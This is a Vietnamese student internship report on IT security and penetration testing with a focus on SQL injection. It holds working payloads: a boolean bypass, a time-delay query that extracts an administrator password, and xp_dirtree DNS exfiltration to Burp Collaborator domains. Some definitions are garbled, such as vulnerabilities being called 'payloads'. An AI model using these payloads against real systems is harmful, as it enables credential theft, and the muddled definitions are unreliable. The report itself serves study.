TỔNG QUAN DOANH NGHIỆP THỰC TẬP VÀ CƠ SỞ LÝ THUYẾT PENTEST
Giới thiệu tổng quan về doanh nghiệp
Địa chỉ: Tòa nhà 02 Quang Trung, Phường Thạch Thang, Quận Hải Châu, Tp Đà Nẵng
Email: iid@danang.gov.vn
Trung tâm Phát triển hạ tầng CNTT Đà Nẵng được thành lập theo Quyết định số 9885/2007/QĐ-UBND ngày 13/12/2007 Sau đó, trung tâm đã được bổ sung thêm chức năng và nhiệm vụ qua các Quyết định số 12/QĐ-UBND ngày 04/01/2011 và Quyết định số 5853/QĐ-UBND.
Hình 1 1 Trung tâm Phát triển hạ tầng CNTT Đà Nẵng
Trung tâm Phát triển hạ tầng công nghệ thông tin Đà Nẵng, được thành lập theo Quyết định số 634/QĐ-UBND ngày 29/01/2015 của UBND thành phố Đà Nẵng, là đơn vị sự nghiệp trực thuộc Sở Thông tin và Truyền thông Trung tâm có các chức năng và nhiệm vụ quan trọng trong việc phát triển hạ tầng công nghệ thông tin tại Đà Nẵng.
Quản lý vận hành hệ thống hạ tầng CNTT-TT thiết yếu phục vụ xây dựng chính quyền điện tử của thành phố
Trung tâm Phát triển hạ tầng công nghệ thông tin Đà Nẵng, được thành lập theo Quyết định số 634/QĐ-UBND ngày 29/01/2015 của UBND thành phố Đà Nẵng, là đơn vị sự nghiệp trực thuộc Sở Thông tin và Truyền thông Trung tâm có nhiệm vụ phát triển hạ tầng công nghệ thông tin nhằm nâng cao hiệu quả quản lý và phục vụ cộng đồng.
A Quản lý, vận hành Khu Công viên phần mềm Đà Nẵng
Trung tâm quản lý có nhiệm vụ tổ chức, quản lý và khai thác hiệu quả các tòa nhà cùng cơ sở hạ tầng công nghệ thông tin mà thành phố giao, nhằm phục vụ cho sự phát triển của ngành công nghiệp phần mềm tại địa phương.
Trực tiếp thực hiện hoặc ủy thác cho các đơn vị thực hiện công tác duy tu, bảo dưỡng và sửa chữa cơ sở hạ tầng cũng như các công trình xây dựng mà Trung tâm được giao quản lý.
Đảm bảo vệ sinh môi trường và phối hợp với chính quyền địa phương để duy trì an ninh trật tự tại các tòa nhà và cơ sở hạ tầng công nghệ thông tin do Trung tâm quản lý.
B Quản lý vận hành hệ thống hạ tầng CNTT-TT thiết yếu phục vụ xây dựng chính quyền điện tử của thành phố
Liên kết với các Trung tâm dữ liệu kinh doanh quốc tế cung cấp giải pháp an ninh cho xác định danh tính điện tử và chữ ký điện tử Các giải pháp này bao gồm an ninh mạng và bảo vệ dữ liệu, đảm bảo an toàn cho thông tin doanh nghiệp và Chính phủ Trung tâm còn có cổng nối mạng quốc tế và kết nối với các kho dữ liệu quốc tế, hỗ trợ hiệu quả cho hoạt động kinh doanh.
- Cung cấp các dữ liệu thương mại điện tử
Lưu trữ và cho thuê kho dữ liệu trực tuyến, xử lý và tích hợp các cơ sở dữ liệu cùng với các phân hệ quản lý của toàn thành phố, nhằm đảm bảo các cơ quan có thể truy cập dữ liệu quản lý và điều hành theo quy định.
1.2 Tổng quan về vị trí việc làm (IT Security)
1.2.1 Khái niệm cơ bản về IT Security
Bảo mật CNTT, hay còn gọi là IT Security, bao gồm tất cả các chiến lược an ninh mạng, từ việc đo lường mức độ bảo mật cho đến việc thực hiện các biện pháp nhằm ngăn chặn những truy cập bất thường.
13 và trái phép vào tài sản thông tin của tổ chức, doanh nghiệp như: Máy tính, mạng, dữ liệu thông tin
Hệ thống IT Security đóng vai trò quan trọng trong việc bảo vệ tính nguyên vẹn và bảo mật thông tin nhạy cảm, đồng thời ngăn chặn các cuộc tấn công từ hacker.
1.2.2 Những công việc do IT Security đảm nhiệm trong một tổ chức
Tùy vào từng tổ chức mà vai trò của vị trí này sẽ thay đổi, nhưng nhìn chung vẫn sẽ là các công việc như sau:
- An toàn vận hành: Giám sát các thông tin được bảo mật và mang tính nhạy cảm của tổ chức ví dụ như các văn bản, chính sách, hợp
- Phối hợp với các phòng ban khác để theo dõi các điểm bất thường và ngăn chặn tấn công mạnh hoặc rò rỉ thông tin tổ chức
Đảm bảo an toàn sản phẩm là rất quan trọng, bao gồm việc kiểm định và giám sát mã nguồn cùng thiết kế sản phẩm Cần dự đoán và xử lý kịp thời các tình huống như lỗi hệ thống, lỗi tràn bộ đệm, mã hóa không an toàn, SQL injection và việc chèn mã độc vào website để bảo vệ dữ liệu và người dùng.
1.3 Cơ sở lý thuyết về PENTEST
1.3.1 Khái niệm cơ bản về PENTEST
Pentest, hay kiểm tra xâm nhập, là phương pháp đánh giá an toàn hệ thống IT thông qua các cuộc tấn công mô phỏng Mục tiêu của pentest là phát hiện những điểm yếu tiềm ẩn trong hệ thống mà tin tặc có thể lợi dụng để gây hại.
Mục tiêu chính của pentest là phát hiện và khắc phục lỗ hổng bảo mật trong tổ chức, nhằm giảm thiểu nguy cơ bị tấn công trong tương lai Người thực hiện kiểm tra xâm nhập, được gọi là pentester, đóng vai trò quan trọng trong việc bảo vệ hệ thống thông tin.
Khi thực hiện xâm nhập, pentester cần có sự cho phép của chủ hệ thống hoặc phần mềm, nếu không sẽ bị coi là hack trái phép Ranh giới giữa pentest và hack chỉ nằm ở sự cho phép của chủ thể, do đó pentest tương tự như ethical hacking, và pentester còn được gọi là hacker mũ trắng.
1.3.2 Tìm hiểu ba khái niệm cơ bản trong bảo mật là “vulnerabilities”, “exploits”, và
Lỗ hổng bảo mật, hay còn gọi là "payloads", là những điểm yếu trong phần mềm, phần cứng, hệ điều hành hoặc ứng dụng web, tạo điều kiện cho kẻ tấn công xâm nhập và tấn công hệ thống.
Lỗ hổng bảo mật có thể đơn giản như mật khẩu yếu hoặc phức tạp như lỗ hổng SQL và tràn bộ nhớ đệm Khai thác là hành động lợi dụng những lỗ hổng, lỗi phần mềm hoặc chuỗi lệnh để gây ra hành vi bất thường trên hệ thống, bao gồm leo thang đặc quyền, đánh cắp thông tin nhạy cảm và tấn công từ chối dịch vụ Trọng tải là phần của hệ thống có lỗ hổng và là mục tiêu chính để thực hiện khai thác.
Hình 1 2 Tổng quan về Pentest
1.3.3 Các hình thức của PENTEST
Trong kiểm thử white box, các chuyên gia pentest nhận được toàn bộ thông tin cần thiết về đối tượng mục tiêu trước khi thực hiện kiểm thử Những thông tin này bao gồm địa chỉ IP, sơ đồ hạ tầng mạng, các giao thức được sử dụng và mã nguồn.
PHẦN TÍCH KÝ THUẬT XÂM NHẬP HỆ THỐNG VỀ BÊN PHÍA MÁY CHỦ
SQL INJECTION
SQL injection (SQLi) là một lỗ hổng bảo mật web cho phép kẻ tấn công can thiệp vào các truy vấn của ứng dụng đối với cơ sở dữ liệu Lỗ hổng này thường cho phép kẻ tấn công truy cập vào dữ liệu mà họ không có quyền, bao gồm thông tin của người dùng khác và các dữ liệu khác mà ứng dụng có thể truy cập Hơn nữa, kẻ tấn công có thể sửa đổi hoặc xóa dữ liệu, dẫn đến những thay đổi nghiêm trọng trong nội dung và hành vi của ứng dụng.
Kẻ tấn công có thể nâng cao một cuộc tấn công SQL injection để xâm nhập vào máy chủ hoặc cơ sở hạ tầng phụ trợ khác, hoặc thực hiện các cuộc tấn công từ chối dịch vụ.
2.1.2 Tác động của một cuộc tấn công SQL injection thành công
Cuộc tấn công SQL injection có thể gây ra truy cập trái phép vào dữ liệu nhạy cảm như mật khẩu và thông tin thẻ tín dụng Nhiều vụ vi phạm dữ liệu nghiêm trọng gần đây xuất phát từ các cuộc tấn công này, dẫn đến thiệt hại về uy tín và các khoản phạt theo quy định Hơn nữa, kẻ tấn công có thể tạo ra một cửa hậu liên tục vào hệ thống, dẫn đến sự xâm phạm lâu dài mà có thể không bị phát hiện trong thời gian dài.
2.1.3 Cách phát hiên lỗ hổng SQL injection
Hầu hết các lỗ hổng SQL injection có thể được phát hiện một cách nhanh chóng và hiệu quả thông qua việc sử dụng trình quét lỗ hổng web của Burp Suite.
SQL injection có thể được phát hiện thủ công thông qua việc sử dụng bộ kiểm tra hệ thống cho tất cả các điểm vào trong ứng dụng Phương pháp này thường bao gồm việc kiểm tra kỹ lưỡng các tham số đầu vào và thực hiện các truy vấn để xác định khả năng bị tấn công.
Gửi ký tự trích dẫn đơn ' và tìm lỗi hoặc các điểm bất thường khác
Để đánh giá giá trị cơ sở của điểm nhập và một giá trị khác trong SQL, cần sử dụng các cú pháp đặc biệt nhằm tìm ra sự khác biệt có hệ thống trong các phản hồi kết quả của ứng dụng.
Gửi các điều kiện Boolean chẳng hạn như OR 1=1và OR 1=2 và tìm kiếm sự khác biệt trong phản hồi của ứng dụng
Gửi tải trọng được thiết kế nhằm kích hoạt độ trễ thời gian trong truy vấn SQL, từ đó giúp phân tích sự khác biệt về thời gian phản hồi.
Gửi tải trọng OAST được phát triển nhằm kích hoạt tương tác mạng ngoài băng tần khi thực hiện truy vấn SQL, đồng thời giám sát mọi tương tác xảy ra.
2.1.4 SQL injection trong các phần khác nhau của truy vấn
Hầu hết các lỗ hổng SQL injection xuất hiện trong mệnh đề WHERE của truy vấn SELECT Loại SQL injection này thường được hiểu rõ bởi những người kiểm tra có kinh nghiệm.
Các lỗ hổng SQL injection có thể xảy ra ở bất kỳ vị trí nào trong truy vấn và trong nhiều loại truy vấn khác nhau Những vị trí phổ biến nhất mà SQL injection phát sinh bao gồm:
Trong UPDATE các câu lệnh, trong các giá trị được cập nhật hoặc WHERE mệnh đề
Trong INSERT các câu lệnh, trong các giá trị được chèn
Trong SELECT các câu lệnh, trong tên bảng hoặc cột
Trong SELECT các câu, trong ORDER BY mệnh đề
2.1.5 Một số lỗ hổng SQL injection phổ biến
2.1.5.1 Truy xuất dữ liệu ẩn
Xem xét việc sử dụng một ứng dụng mua sắm hiển thị nhiều sản phẩm thuộc các danh mục khác nhau Khi người dùng chọn danh mục "Quà tặng", trình duyệt sẽ yêu cầu URL tương ứng để hiển thị các sản phẩm phù hợp.
Điều này khiến ứng dụng tạo ra một truy vấn SQL để truy xuất thông tin chi tiết về sản phẩm có liên quan từ cơ sở dữ liệu:
Truy vấn SQL này yêu cầu cở sở dữ liệu trả về:
Trong đó danh mục là Quà tặng
Hạn chế released = 1 đang được sử dụng để ẩn các sản phẩm không được phát hành Đối với các sản phẩm chưa được phát hành, có lẽ là released = 0
Ứng dụng không áp dụng biện pháp bảo vệ nào chống lại các cuộc tấn công SQL injection, cho phép kẻ tấn công thực hiện các cuộc tấn công và dẫn đến việc truy vấn SQL bị xâm phạm.
Sự khác biệt nằm ở trình tự của hai dấu gạch ngang – –, khi đó phần còn lại của truy vấn được hiểu như một nhận xét Hành động này dẫn đến việc truy vấn không còn chứa tệp AND released = 1.
— > tất cả sản phẩm được hiển thị, bao gồm cả các sản phẩm chưa được phát hành
Kẻ tấn công có khả năng làm cho ứng dụng hiển thị tất cả các sản phẩm trong bất kỳ danh mục nào, bao gồm cả những danh mục không được biết đến, dẫn đến việc thực hiện truy vấn SQL không mong muốn.
SELECT * FROM products WHERE category = 'Gifts' OR 1=1 ' AND released = 1
Truy vấn đã sửa đổi sẽ trả về tất cả các mục có danh mục là Quà tặng hoặc 1 bằng 1
Vì 1=1 luôn luôn đúng nên truy vấn sẽ trả về tất cả các mục
Cẩn thận khi sử dụng điều kiện OR 1=1 trong truy vấn SQL, vì mặc dù nó có vẻ vô hại trong ngữ cảnh ban đầu, nhưng có thể gây ra hậu quả nghiêm trọng Các ứng dụng thường sử dụng dữ liệu từ một yêu cầu trong nhiều truy vấn khác nhau Nếu điều kiện này được áp dụng trong các câu lệnh UPDATE hoặc DELETE, nó có thể dẫn đến mất dữ liệu không mong muốn.
2.1.5.2 Subverting logic ứng dụng
Khai thác Blind SQL injection bằng cách kích hoạt các lỗi có điều kiện
Trong tình huống này, ứng dụng có thể trả về phản hồi có điều kiện bằng cách kích hoạt lỗi SQL một cách có điều kiện Điều này có nghĩa là sửa đổi truy vấn để gây ra lỗi cơ sở dữ liệu khi điều kiện đúng, nhưng không gây ra lỗi khi điều kiện sai Quá trình này hoạt động khi hai yêu cầu được gửi với giá trị cookie TrackingId khác nhau.
CASE: Sử dụng để kiểm tra điều kiện và trả về biểu thức đó đúng hay không
Đầu 1: CASE biêu thức tính thành ‘a’, điều này không gây lỗi
Đầu 2: Ước tính thành 1/0, gây lỗi chia 0
Lỗi trong phản hồi HTTP của ứng dụng có thể tạo ra những khác biệt nhất định Chúng ta có thể sử dụng những khác biệt này để suy luận về việc điều kiện đã được sửa chữa đúng cách hay chưa.
Trích xuất dữ liệu nhạy cảm thông báo lỗi SQL dài dòng
Cấu hình sai cơ sở dữ liệu có thể gây ra những thông báo lỗi dài dòng, cung cấp thông tin quý giá cho kẻ tấn công.
Ví dụ: hãy xem xét thông báo lỗi sau
Chuỗi không kết thúc bắt đầu tại vị trí 52 trong câu lệnh SQL SELECT * FROM tracking WHERE id = ''' Điều này hiển thị toàn bộ truy vấn mà ứng dụng đã tạo từ đầu vào của chúng ta, cho phép chúng ta thấy ngữ cảnh mà chúng ta đang đưa vào, cụ thể là một chuỗi trích dẫn đơn bên trong câu lệnh WHERE Việc này giúp dễ dàng xây dựng một truy vấn hợp lệ có chứa tải trọng độc hại Trong trường hợp này, việc nhận xét phần còn lại của truy vấn sẽ ngăn chặn các trích dẫn đơn thừa không làm hỏng cú pháp Đôi khi, bạn có thể khiến ứng dụng tạo ra thông báo lỗi có chứa một số dữ liệu được truy vấn trả về, biến lỗ hổng SQL injection mù thành một lỗ hổng "hiển thị".
Một phương pháp để đạt được điều này là sử dụng hàm CAST(), cho phép chuyển đổi kiểu dữ liệu này sang kiểu dữ liệu khác Ví dụ, hãy xem một truy vấn với câu lệnh sau:
Khi làm việc với dữ liệu, bạn thường gặp phải chuỗi ký tự Việc chuyển đổi chuỗi này sang kiểu dữ liệu không tương thích, như số nguyên (int), có thể dẫn đến lỗi.
Loại truy vấn này hữu ích khi bạn không thể kích hoạt phản hồi có điều kiện do giới hạn ký tự trong truy vấn.
2.1.5.4.3 Khai thác kỹ thuật chèn SQL mù bằng cách kích hoạt độ trễ thời gian
Các kỹ thuật kích hoạt thời gian trễ phụ thuộc vào loại cơ sở dữ liệu được sử dụng Trên Microsoft SQL Server, có thể kiểm tra một điều kiện để kích hoạt độ trễ Ví dụ, nếu điều kiện 1=2 là sai, độ trễ sẽ không được kích hoạt Ngược lại, nếu điều kiện 1=1 là đúng, độ trễ sẽ được kích hoạt trong 10 giây.
Bằng cách áp dụng kỹ thuật này, chúng ta có thể truy xuất dữ liệu một cách có hệ thống bằng cách kiểm tra từng ký tự một.
'; IF (SELECT COUNT(Username) FROM Users WHERE Username = 'Administrator' AND SUBSTRING(Password, 1, 1) > 'm') = 1 WAITFOR DELAY '0:0:{delay}'
2.1.5.4.4 Khai thác kỹ thuật Blind SQL injection sử dụng lỹ thuật out-of-band (OAST)
Ứng dụng thực hiện truy vấn SQL một cách không đồng bộ, cho phép xử lý yêu cầu của người dùng trong luồng ban đầu Đồng thời, một luồng khác sẽ thực hiện truy vấn bằng cách sử dụng cookie theo dõi để quản lý và theo dõi tiến trình.
Trong tình huống này, lỗ hổng SQL có thể được khai thác thông qua việc kích hoạt các tương tác mạng ngoài băng tần với hệ thống mà bạn kiểm soát.
Các kỹ thuật kích hoạt truy vấn DNS phụ thuộc vào loại cơ sở dữ liệu được sử dụng Đối với Microsoft SQL Server, có thể sử dụng các đầu vào cụ thể để thực hiện tra cứu DNS trên miền đã chỉ định.
';execmaster xp_dirtree'//0efdymgw1o5w9inae8mg4dfrgim9ay.burpcollaborator.net/ a' Điều này sẽ khiến cơ sở dữ liệu thực hiện tra cứu cho miền sau:
Bạn có thể sử dụng Burp Collaborator để tạo một tên miền phụ độc đáo và kiểm tra phản hồi từ máy chủ Collaborator, nhằm xác nhận sự tồn tại của bất kỳ tra cứu DNS nào.
Sau khi xác nhận phương pháp kích hoạt các tương tác ngoài băng tần, bạn có thể tận dụng kênh ngoài băng tần để thu thập dữ liệu từ ứng dụng có nguy cơ bị tấn công.
'; declare @p varchar(1024);set @p=(SELECT password FROM users WHERE username='Administrator');exec('master xp_dirtree
"//'+@p+'.cwcsgt05ikji0n1f2qlzn5118sek29.burpcollaborator.net/a"')
Dữ liệu đầu vào này cho phép đọc mật khẩu của người dùng Administrator, kết nối với miền con Cộng tác viên duy nhất và kích hoạt tra cứu DNS Kết quả sẽ cho phép bạn xem mật khẩu đã được lấy thông qua tra cứu DNS.
Các kỹ thuật ngoài băng tần (OAST) là phương pháp hiệu quả để phát hiện và khai thác kỹ thuật chèn SQL mù, nhờ vào tỷ lệ thành công cao và khả năng trích xuất dữ liệu trực tiếp từ kênh ngoài băng tần Do đó, OAST thường được ưu tiên hơn so với các kỹ thuật khai thác mù khác trong nhiều tình huống.
2.1.5.4.5 Cách ngăn chặn các cuộc tấn công SQL injection Blind
Mặc dù việc phát hiện và khai thác các lỗ hổng chèn SQL mù phức tạp hơn so với chèn SQL thông thường, nhưng các biện pháp phòng ngừa vẫn giữ nguyên giá trị Để bảo vệ hệ thống khỏi các lỗ hổng này, cần áp dụng các biện pháp ngăn chặn chèn SQL một cách đồng bộ, bất kể loại lỗ hổng.
TRIỂN KHAI THỰC NGHIỆM
Tiến hành tấn công
Link tấn công: https://www.youtube.com/watch?vGKyVc8cKI&ts
KẾT LUẬN VÀ HƯỚNG PHÁT TRIỂN
Nghiên cứu và thực hiện đề tài xâm nhập hệ thống máy chủ nhằm phân tích xu hướng tấn công mạng và đánh cắp dữ liệu, đồng thời đề xuất các giải pháp phòng chống hiệu quả.
Trong suốt quá trình nghiên cứu đề tài, tôi đã nhận được sự hướng dẫn tận tình từ Ths Nguyễn Văn Chức, Anh Lê Tự Việt Thắng và các anh trong phòng An toàn bảo mật tại Trung tâm phát triển hạ tầng CNTT Đà Nẵng Nhờ vào sự hỗ trợ này cùng với nỗ lực cá nhân, nội dung của đề tài đã hoàn thiện và đạt được các mục tiêu ban đầu.
Trong suốt thời gian thực tập, tôi đã học hỏi được nhiều kiến thức và nâng cao kỹ năng nghiên cứu về công nghệ cũng như tư duy phân tích Kỳ thực tập tốt nghiệp này đã giúp tôi nhận ra những hạn chế của bản thân, đặc biệt là về kiến thức chuyên ngành và kỹ thuật Tôi cam kết sẽ nỗ lực khắc phục những tồn tại này để không ngừng phát triển trong tương lai.
Khóa học PortSwigger, “Learning Path SQL injection”, 2023 [Online] Available: https://portswigger.net/web-security/sql-injection
Khóa học PortSwigger, “Learning Path Server-Side request forgery”, 2023 [Online] Available: https://portswigger.net/web-security/ssrf
Khóa học PortSwigger, “Learning Path File Upload vulnerabilities”, 2023 [Online] Available: https://portswigger.net/web-security/file-upload
HostingViet.VN, “Pentest là gì? Lý do chúng ta cần kiểm tra thử xâm nhập”, 2023 [Online] Available: https://hostingviet.vn/pentest-la-gi
IT Security là một lĩnh vực quan trọng trong công nghệ thông tin, đóng vai trò bảo vệ hệ thống và dữ liệu khỏi các mối đe dọa Nghề này không chỉ mang lại cơ hội việc làm ổn định mà còn có khả năng phát triển bền vững trong tương lai Với sự gia tăng của các cuộc tấn công mạng, nhu cầu về chuyên gia IT Security ngày càng cao, khẳng định rằng đây là một nghề không bao giờ lỗi thời Việc sở hữu kỹ năng và kiến thức trong lĩnh vực này sẽ giúp bạn gia tăng cơ hội nghề nghiệp và thành công trong ngành công nghệ.
In her 2020 article, "IT Security: What to Do to Become the Firewall of Your Organization," Hoàng Ngân emphasizes the critical role of IT security in protecting organizational assets She discusses essential strategies for individuals aiming to enhance their cybersecurity skills and become effective defenders against cyber threats The article highlights the importance of continuous learning, staying updated with the latest security trends, and implementing robust security measures By adopting a proactive approach to IT security, professionals can significantly contribute to safeguarding their organizations from potential cyberattacks For more insights, visit the full article [here](https://www.jobhopin.com/blog/it-va-cyber-security-nhung-dieu-can-biet-neu-muon-tro-thanh-buc-tuong-lua-cua-to-chuc/#:~:text=IT%20Security%20c%C3%B2n%20%C4%91%C6%B0%E1%BB%A3c%20g).
%E1%BB%8Di,t%E1%BB%95%20ch%E1%BB%A9c%20lu%C3%B4n%20an%20to%C3% A0n
Quách Chí Cường, “DVWA là gì? Damn Vulnerable Web Application là gì?” Availble: https://cuongquach.com/dvwa-la-gi-damn-vulnerable-web-application.html/amp
Vinh Phạm, “BurpSuite là gì? Những tính năng nổi bật của BurpSuite”, 2021 Availble: https://bizflycloud.vn/tin-tuc/burp-suite-la-gi-
20210923115858755.htm#:~:text=Burp%20Suite%20ch%E1%BB%A9a%20m%E1%BB% 99t%20proxy,t%C3%A1c%20copy%2Dpaste%20th%E1%BB%A7%20c%C3%B4ng